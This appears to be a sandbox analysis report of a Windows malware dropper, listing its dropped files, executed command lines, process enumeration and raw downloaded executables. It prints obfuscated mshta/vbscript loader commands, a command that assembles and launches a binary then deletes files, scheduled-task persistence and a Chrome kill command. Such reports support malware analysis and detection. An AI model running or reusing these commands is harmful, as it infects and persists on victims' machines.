file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\background.js
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1
domain ipinfo.io
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\content.js
file C:\Users\test22\Pictures\Adobe Films\dfjGrIRplh8E6xLCwTkR51co.exe
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\pad-nopadding.js
file C:\Users\test22\Documents\5mtQoaCdFoT9WiAeXXqhQNJK.dll
file C:\Users\test22\Documents\u7bmZ_Jch5QWYEh3mRgkn8v4.exe
file C:\Users\test22\Pictures\Adobe Films\pImS5RWnyPoH71MUnlZxfr7l.exe
file C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe
file C:\Users\test22\Pictures\Adobe Films\6aOsph8Vk68scxMNFvQ7Uzqb.exe
file C:\Program Files\Windows NT\EBPCICFIYY\foldershare.exe
file C:\Users\test22\Pictures\Adobe Films\WiYqA2zBXVHeg1hqJ12GluSw.exe
file C:\Users\test22\Pictures\Adobe Films\Gul5rTCKpjXo0MogByz6Rjtk.exe
file C:\Users\test22\AppData\Local\Temp\pidHTSIGEi8DrAmaYu9K8ghN89.dll
file C:\Users\test22\AppData\Local\Temp\is-ADCTA.tmp\_isetup\_shfoldr.dll
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\jquery-3.3.1.min.js
file C:\Users\test22\Pictures\Adobe Films\ZDJ2UKOjrj_0bfm6hPadSwx2.exe
file C:\Users\test22\Pictures\Adobe Films\moAvWFpOQZD1e8sxHLAKrthe.exe
file C:\Users\test22\AppData\Local\Temp\25-c4647-5ce-46289-077b3ce9ed0d6\Nygaefoqypu.exe
file C:\Users\test22\AppData\Local\Temp\is-ADCTA.tmp\Adam.exe
file C:\Users\test22\AppData\Local\Temp\is-ADCTA.tmp\idp.dll
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\aes.js
file C:\Users\test22\Pictures\Adobe Films\CsOtXVBhUjDrvtRgizng8F7v.exe
file C:\Users\test22\Pictures\Adobe Films\xmi8r9WNNrVSGcFZGMShRqy0.exe
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\mode-ecb.js
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\background.js
cmdline MSHtA.eXE vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF """"== """" for %w iN ( ""C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe"" ) do taskkill /f -Im ""%~nXw"" " , 0 , TrUE ) )
cmdline MSHtA.eXE vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""-pSEIMItxZzhTvqGZd ""== """" for %w iN ( ""C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE"" ) do taskkill /f -Im ""%~nXw"" " , 0 , TrUE ) )
cmdline C:\Windows\system32\cmd.exe /S /D /c" EChO "
cmdline "C:\Windows\System32\cmd.exe" /C EChO | Set /p = "MZ" > XAJ5SctM.IMN & COPY /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I & StArT control.exe ..\QVNGP.I &del /Q *
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
cmdline C:\Windows\System32\cmd.exe /C coPy /Y "C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF "-pSEIMItxZzhTvqGZd "== "" for %w iN ( "C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE" ) do taskkill /f -Im "%~nXw"
cmdline "C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""-pSEIMItxZzhTvqGZd ""== """" for %w iN ( ""C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE"" ) do taskkill /f -Im ""%~nXw"" " , 0 , TrUE ) )
cmdline C:\Windows\system32\cmd.exe /S /D /c" Set /p = "MZ" 1>XAJ5SctM.IMN"
cmdline C:\Windows\System32\cmd.exe /C coPy /Y "C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""== "" for %w iN ( "C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe" ) do taskkill /f -Im "%~nXw"
cmdline Cmd.exe /C EChO | Set /p = "MZ" > XAJ5SctM.IMN & COPY /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I & StArT control.exe ..\QVNGP.I &del /Q *
cmdline "C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF "-pSEIMItxZzhTvqGZd "== "" for %w iN ( "C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE" ) do taskkill /f -Im "%~nXw"
cmdline "C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""== "" for %w iN ( "C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe" ) do taskkill /f -Im "%~nXw"
cmdline MSHTa.Exe vbsCRipT: cLose ( cReaTEoBjECT ("WSCriPt.SHELl" ). RuN( "Cmd.exe /C EChO | Set /p = ""MZ"" > XAJ5SctM.IMN & COPY /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I & StArT control.exe ..\QVNGP.I & del /Q * " , 0 , true ) )
cmdline "C:\Windows\System32\mshta.exe" vbsCRipT: cLose ( cReaTEoBjECT ("WSCriPt.SHELl" ). RuN( "Cmd.exe /C EChO | Set /p = ""MZ"" > XAJ5SctM.IMN & COPY /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I & StArT control.exe ..\QVNGP.I & del /Q * " , 0 , true ) )
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
cmdline cmd.exe /c taskkill /f /im chrome.exe
cmdline "C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF """"== """" for %w iN ( ""C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe"" ) do taskkill /f -Im ""%~nXw"" " , 0 , TrUE ) )
file C:\Users\test22\Documents\u7bmZ_Jch5QWYEh3mRgkn8v4.exe
file C:\Users\test22\Pictures\Adobe Films\6aOsph8Vk68scxMNFvQ7Uzqb.exe
file C:\Users\test22\Pictures\Adobe Films\ZDJ2UKOjrj_0bfm6hPadSwx2.exe
file C:\Users\test22\Pictures\Adobe Films\WiYqA2zBXVHeg1hqJ12GluSw.exe
file C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe
file C:\Users\test22\Pictures\Adobe Films\dfjGrIRplh8E6xLCwTkR51co.exe
file C:\Users\test22\Pictures\Adobe Films\moAvWFpOQZD1e8sxHLAKrthe.exe
file C:\Users\test22\Pictures\Adobe Films\CsOtXVBhUjDrvtRgizng8F7v.exe
file C:\Users\test22\Pictures\Adobe Films\xmi8r9WNNrVSGcFZGMShRqy0.exe
file C:\Users\test22\Pictures\Adobe Films\pImS5RWnyPoH71MUnlZxfr7l.exe
file C:\Users\test22\Pictures\Adobe Films\Gul5rTCKpjXo0MogByz6Rjtk.exe
file C:\Program Files\Windows NT\EBPCICFIYY\foldershare.exe
file C:\Users\test22\AppData\Local\Temp\is-ADCTA.tmp\Adam.exe
file C:\Users\test22\AppData\Local\Temp\QVNGp.I
file C:\Users\test22\AppData\Local\Temp\is-1PC33.tmp\Gul5rTCKpjXo0MogByz6Rjtk.tmp
file C:\Users\test22\AppData\Local\Temp\is-ADCTA.tmp\_isetup\_shfoldr.dll
file C:\Users\test22\AppData\Local\Temp\is-ADCTA.tmp\idp.dll
file C:\Users\test22\AppData\Local\Temp\is-3QENA.tmp\pImS5RWnyPoH71MUnlZxfr7l.tmp
file C:\Users\test22\AppData\Local\Temp\25-c4647-5ce-46289-077b3ce9ed0d6\Nygaefoqypu.exe
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "L_0PQ1nH1s1hf_DH8W5V8AUl.exe")
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\Pictures//Adobe Films\6aOsph8Vk68scxMNFvQ7Uzqb.exe
parameters:
filepath: C:\Users\test22\Pictures\Adobe Films\6aOsph8Vk68scxMNFvQ7Uzqb.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\Pictures//Adobe Films\ZDJ2UKOjrj_0bfm6hPadSwx2.exe
parameters:
filepath: C:\Users\test22\Pictures\Adobe Films\ZDJ2UKOjrj_0bfm6hPadSwx2.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\Pictures//Adobe Films\WiYqA2zBXVHeg1hqJ12GluSw.exe
parameters:
filepath: C:\Users\test22\Pictures\Adobe Films\WiYqA2zBXVHeg1hqJ12GluSw.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\Pictures//Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe
parameters:
filepath: C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\Pictures//Adobe Films\dfjGrIRplh8E6xLCwTkR51co.exe
parameters:
filepath: C:\Users\test22\Pictures\Adobe Films\dfjGrIRplh8E6xLCwTkR51co.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\Pictures//Adobe Films\moAvWFpOQZD1e8sxHLAKrthe.exe
parameters: /mixtwo
filepath: C:\Users\test22\Pictures\Adobe Films\moAvWFpOQZD1e8sxHLAKrthe.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\Pictures//Adobe Films\CsOtXVBhUjDrvtRgizng8F7v.exe
parameters: silent
filepath: C:\Users\test22\Pictures\Adobe Films\CsOtXVBhUjDrvtRgizng8F7v.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\Pictures//Adobe Films\xmi8r9WNNrVSGcFZGMShRqy0.exe
parameters:
filepath: C:\Users\test22\Pictures\Adobe Films\xmi8r9WNNrVSGcFZGMShRqy0.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\Pictures//Adobe Films\pImS5RWnyPoH71MUnlZxfr7l.exe
parameters:
filepath: C:\Users\test22\Pictures\Adobe Films\pImS5RWnyPoH71MUnlZxfr7l.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\Pictures//Adobe Films\Gul5rTCKpjXo0MogByz6Rjtk.exe
parameters:
filepath: C:\Users\test22\Pictures\Adobe Films\Gul5rTCKpjXo0MogByz6Rjtk.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Windows\system32\cmd.exe
parameters: /C coPy /Y "C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""== "" for %w iN ( "C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe" ) do taskkill /f -Im "%~nXw"
filepath: C:\Windows\System32\cmd.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Windows\system32\cmd.exe
parameters: /C coPy /Y "C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF "-pSEIMItxZzhTvqGZd "== "" for %w iN ( "C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE" ) do taskkill /f -Im "%~nXw"
filepath: C:\Windows\System32\cmd.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: Cmd.exe
parameters: /C EChO | Set /p = "MZ" > XAJ5SctM.IMN & COPY /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I & StArT control.exe ..\QVNGP.I &del /Q *
filepath: Cmd.exe
1 1 0
Time & API Arguments Status Return Repeated

Process32NextW

 snapshot_handle: 0x000004f4
process_name: smss.exe
process_identifier: 224
1 1 0

Process32NextW

 snapshot_handle: 0x000004f4
process_name: csrss.exe
process_identifier: 364
1 1 0

Process32NextW

 snapshot_handle: 0x000004f4
process_name: winlogon.exe
process_identifier: 396
1 1 0

Process32NextW

 snapshot_handle: 0x000004f4
process_name: svchost.exe
process_identifier: 640
1 1 0

Process32NextW

 snapshot_handle: 0x000004f4
process_name: svchost.exe
process_identifier: 700
1 1 0

Process32NextW

 snapshot_handle: 0x000004f4
process_name: svchost.exe
process_identifier: 776
1 1 0

Process32NextW

 snapshot_handle: 0x000004f4
process_name: svchost.exe
process_identifier: 824
1 1 0

Process32NextW

 snapshot_handle: 0x000004f4
process_name: audiodg.exe
process_identifier: 892
1 1 0

Process32NextW

 snapshot_handle: 0x000004f4
process_name: svchost.exe
process_identifier: 968
1 1 0

Process32NextW

 snapshot_handle: 0x000004f4
process_name: svchost.exe
process_identifier: 264
1 1 0

Process32NextW

 snapshot_handle: 0x000004f4
process_name: srvany.exe
process_identifier: 1244
1 1 0

Process32NextW

 snapshot_handle: 0x000004f4
process_name: taskhost.exe
process_identifier: 1284
1 1 0

Process32NextW

 snapshot_handle: 0x000004f4
process_name: KMService.exe
process_identifier: 1324
1 1 0

Process32NextW

 snapshot_handle: 0x000004f4
process_name: conhost.exe
process_identifier: 1376
1 1 0

Process32NextW

 snapshot_handle: 0x000004f4
process_name: svchost.exe
process_identifier: 1876
1 1 0

Process32NextW

 snapshot_handle: 0x000004f4
process_name: dwm.exe
process_identifier: 1496
1 1 0

Process32NextW

 snapshot_handle: 0x000004f4
process_name: explorer.exe
process_identifier: 1848
1 1 0

Process32NextW

 snapshot_handle: 0x000004f4
process_name: WmiPrvSE.exe
process_identifier: 1916
1 1 0

Process32NextW

 snapshot_handle: 0x000004f4
process_name: pw.exe
process_identifier: 2816
1 1 0

Process32NextW

 snapshot_handle: 0x000004f4
process_name: SearchProtocolHost.exe
process_identifier: 1480
1 1 0

Process32NextW

 snapshot_handle: 0x000004f4
process_name: SearchFilterHost.exe
process_identifier: 3040
1 1 0

Process32NextW

 snapshot_handle: 0x000004f4
process_name: SearchProtocolHost.exe
process_identifier: 2120
1 1 0

Process32NextW

 snapshot_handle: 0x000004f4
process_name: mobsync.exe
process_identifier: 1068
1 1 0

Process32NextW

 snapshot_handle: 0x000004f4
process_name: taskhost.exe
process_identifier: 3032
1 1 0

Process32NextW

 snapshot_handle: 0x000004f4
process_name: u7bmZ_Jch5QWYEh3mRgkn8v4.exe
process_identifier: 1892
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6aOsph8Vk68scxMNFvQ7Uzqb.exe
process_identifier: 2644
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: ZDJ2UKOjrj_0bfm6hPadSwx2.exe
process_identifier: 1908
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: inject-x86.exe
process_identifier: 1896
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: conhost.exe
process_identifier: 2072
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: WiYqA2zBXVHeg1hqJ12GluSw.exe
process_identifier: 2080
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: L_0PQ1nH1s1hf_DH8W5V8AUl.exe
process_identifier: 2744
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: is32bit.exe
process_identifier: 1396
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: ZDJ2UKOjrj_0bfm6hPadSwx2.exe
process_identifier: 656
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: mshta.exe
process_identifier: 2112
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: cmd.exe
process_identifier: 3016
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: inject-x86.exe
process_identifier: 1596
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: conhost.exe
process_identifier: 900
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: inject-x86.exe
process_identifier: 2064
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: mshta.exe
process_identifier: 2212
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: inject-x86.exe
process_identifier: 2084
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: dfjGrIRplh8E6xLCwTkR51co.exe
process_identifier: 1808
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: moAvWFpOQZD1e8sxHLAKrthe.exe
process_identifier: 668
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: cmd.exe
process_identifier: 1408
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: WmiPrvSE.exe
process_identifier: 2780
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: conhost.exe
process_identifier: 2608
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: mshta.exe
process_identifier: 2324
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: is32bit.exe
process_identifier: 2076
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: CsOtXVBhUjDrvtRgizng8F7v.exe
process_identifier: 2344
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: is32bit.exe
process_identifier: 1468
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: inject-x86.exe
process_identifier: 604
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

InternetReadFile

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $xXUû<9;¨<9;¨<9;¨(R8©69;¨(R>©¯9;¨(R?©.9;¨7V?©-9;¨7V8©*9;¨7V>©9;¨(R:©?9;¨<9:¨a9;¨úV2©?9;¨úVĨ=9;¨<9¬¨=9;¨úV9©=9;¨Rich<9;¨PEL?~Xaà `Ø@Šp@`@Á Ö(86@äLÃhÃ@p,.textŸ_` `.rdataºlpnd@@.dataøà Ò@À.rsrc868Ü@@.relocä@@BU‹ìh¨ÁB¹0õBè^ÍhpoBèkwƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌS‹ÜƒìƒäðƒÄU‹k‰l$‹ìì¡àB3ʼnEü3ÀˆEß3ɈMÞ3҈U݊E߈E؊MވMԊU݈UÐÇE¸´Iž;ÇE¼3ÓÁ.‹E¸‰E ‹M¼‰M¤ÇE°æ¡!ÇE´¾ÄK‹U°‰U¨‹E´‰E¬M ‰MÈÇEà…zž;ÇEä3ÓÁ.ÇEèæ¡!ÇEì¾ÄK3҈U܊E܈EÌ(Eà)E€‹MÈ)E(EfïE€)…pÿÿÿ(…pÿÿÿ‹UÈ‹EȉEċMÄQ¹õBèÓh€oBèbvƒÄ‹Mü3ÍèØs‹å]‹ã[ÃÌÌÌÌÌÌÌU‹ìh¨ÁB¹HõBèÌhoBè+vƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ì¸`õB]ÃÌÌÌÌÌÌU‹ìQ‰Mü‹EüÇôrB3ɋUüƒÂ‰ ‰J‹EüƒÀP‹MƒÁQ脃ċEü‹å]ÂÌÌÌÌU‹ìƒì‰Mü‹Eüƒxt ‹Mü‹Q‰UøëÇEø<ÁB‹Eø‹å]ÃÌÌÌÌÌU‹ìQ‰Mü‹EüÇôrB‹MüƒÁQè „ƒÄ‹Uƒâtj ‹EüPèzuƒÄ‹Eü‹å]ÂÌÌU‹ìQ‰Mü‹EüÇôrB‹MüƒÁQèʃƒÄ‹å]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìQ‰Mü‹EüÇôrB3ɋUüƒÂ‰ ‰J‹EüÇ@PÁB‹MüÇsB‹UüÇìvB‹Eü‹å]ÃU‹ìƒì Môè²ÿÿÿhôÕBEôP跇‹å]ÃU‹ìQ‰Mü‹EüÇôrB3ɋUüƒÂ‰ ‰J‹EüƒÀP‹MƒÁQèƒċUüÇsB‹EüÇìvB‹Eü‹å]ÂÌÌU‹ìQ‰Mü‹EüÇôrB3ɋUüƒÂ‰ ‰J‹EüƒÀP‹MƒÁQès‚ƒÄ‹UüÇsB‹Eü‹å]ÂÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì‰Uø‰Mü‹Eø‹ƒÁ#‹Uø‰ ‹Eü‹‰MìºkÂÿ‹M싉UðÇEè‹Eü‹+Mð‰Môƒ}ôrƒ}ô#wë 蜴3Òu÷3Àuå‹Mü‹Uð‰‹å]ÃÌÌÌÌÌU‹ìƒì0V‹E‰Eø‹M ‰Mü‹Uø‹Eü‰Uð‰Eô‹Mð Môu‹Uø‹EüƒÂ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer:  hMZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $;Y:õ8T¦8T¦8T¦Ë¤¥¦t8T¦Ë¤§¦ñ8T¦Ë¤¦¦f8T¦5]W§u8T¦5]Q§O8T¦5]P§^8T¦\U§z8T¦8U¦Ù8T¦o^T§~8T¦o^Q§{8T¦o^]§M8T¦o^V§~8T¦Rich8T¦PEd†æ³l[ð"  útÐÉ€ ðÉ`Aúü<pÀZ >¸ ” T0õ(Â .text¬ùú `.rdata|$&þ@@.data˜$@$@À.pdataÀp2@@.reloc¸  N@BL‹ÜHƒìhIÇCÈþÿÿÿH‹0H3ÄH‰D$X3ÀI‰CàIÇCèf‰D$8MCÐHÇ€H Sè„H‹D$PHƒør.H‹L$8HEH=rH‹QøH+ÊHAøHƒøw&H‹ÊèSH Øõè½H‹L$XH3Ìèv¹HƒÄhÃèd̐Hƒì8HÇD$ þÿÿÿE3À3ÒèísH‰ SHƒ%SWÀfSó;äóßRºH ëRè²lH‹ÏRH‰D$@LD$@ºH ÉRèØiHÇÑRHÇÎRH /õHƒÄ8鼐HìÈH‹Ê.H3ÄH‰„$°E3ÀH %Q3Òÿ•þ…Àt$H úô聼H‹Œ$°H3Ìèu¸HÄÈÃÿWÿD‹ÀHL$ èNvHìHL$ è¹×̐Hƒì8HÇD$ þÿÿÿE3À3ÒèÍrH‰ªQHƒ%²QWÀf¯QóãóQºH sQè–gH gôHƒÄ8éÚ»HìÈH‹Ú-H3ÄH‰„$°E3ÀH eP3Òÿ¥ý…Àt$H *ô葻H‹Œ$°H3Ì腷HÄÈÃÿgþD‹ÀHL$ è^uHëHL$ èÉÖ̐é“„éƒ„é„éc„éS„é߃é3„é#„é¯ƒH Yóé°ºHƒì(苃H‰˜OHƒÄ(АHƒì(H ÅÔÿÇüH‹ÈHUÞHƒÄ(Hÿ% ýHƒì(H •Ôÿ—üH‹ÈH5ÞHƒÄ(Hÿ%ÚüHƒì(è ƒH‰(O
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $I4€! Uîr Uîr Uîr>êsUîr>ísUîr>ësŸUîr:êsUîr:ísUîr:ës$Uîr>ïsUîr UïroUîrË:çs UîrË:r UîrË:ìs UîrRich UîrPEd†\Ì<að" zŽ|7@P`TÔ(0è´@œе8¶0¨.text¥yz `.rdataTMN~@@.dataŒà Ì@À.pdata´Ø@@_RDATA” î@@.rsrcè0ð@@.relocœ@ò@BH 9yéÌ$ÌÌÌÌHAíÃÌÌÌÌÌÌÌÌH‰T$L‰D$L‰L$ SVWHƒì0H‹úHt$`H‹ÙèÊÿÿÿE3ÉH‰t$ L‹ÇH‹ÓH‹è<‚HƒÄ0_^[ÃÌÌÌÌÌÌÌÌÌÌÌÌ@SHƒì H‹ÙH‹ÂH õ‚WÀHSH‰ HHèc1H‹ÃHƒÄ [ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌH‹QH%H…ÒHEÂÃÌÌÌÌÌÌÌÌÌÌÌÌÌH‰\$WHƒì H—‚H‹ùH‰‹ÚHƒÁèš1öÃt ºH‹Ïèì#H‹\$0H‹ÇHƒÄ _ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌHQ‚H‰HƒÁéY1ÌÌÌÌÌÌÌÌÌÌÌÌÌH±HÇAH‰AH¾‚H‰H‹ÁÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌHƒìHHL$ èÂÿÿÿH³ÂHL$ è!3Ì@SHƒì H‹ÙH‹ÂH ՁWÀHSH‰ HHèC0HX‚H‰H‹ÃHƒÄ [ÃÌÌÌÌ@SHƒì H‹ÙH‹ÂH •WÀHSH‰ HHè0HH‰H‹ÃHƒÄ [ÃÌÌÌÌH‰\$H‰t$WHìpH‹çÍH3ÄH‰„$`3öÿ<~‹ø3ҍNÿï}H‹ØH‰D$ HƒøÿtF3ÒA¸0HL$0è·4ÇD$00HT$0H‹Ëÿ}…Àt9|$8tHT$0H‹ËÿÁ}ëæ‹t$PHƒûÿt H‹Ëÿ´}‹ÆH‹Œ$`H3Ìè‚Lœ$pI‹[I‹sI‹ã_ÃÌÌÌÌÌÌÌÌÌÌÌÌÌH‰\$WHìH‹ÍH3ÄH‰„$€H‹Ù3ÀH‰H‰AH‰A3ҍHÿ}H‹øH‰D$ Hƒøÿ„‹3ÒA¸0HL$Pèâ3ÇD$P0HT$PH‹Ïÿ¬|…Àt_„LD$XHT$|HL$(èÜH‹ÐH‹KH;Kt è*HƒC(ëL‹ÂH‹ÑH‹Ëè¥HL$(èKHT$PH‹Ïÿ¥|…Àu©Hƒÿÿt H‹Ïÿš|H‹ÃH‹Œ$€H3ÌègH‹œ$¨HÄ_ÃÌÌÌÌÌÌ@SHƒì H‹QH‹ÙHƒú
request_handle: 0x00cc000c
1 1 0

InternetReadFile

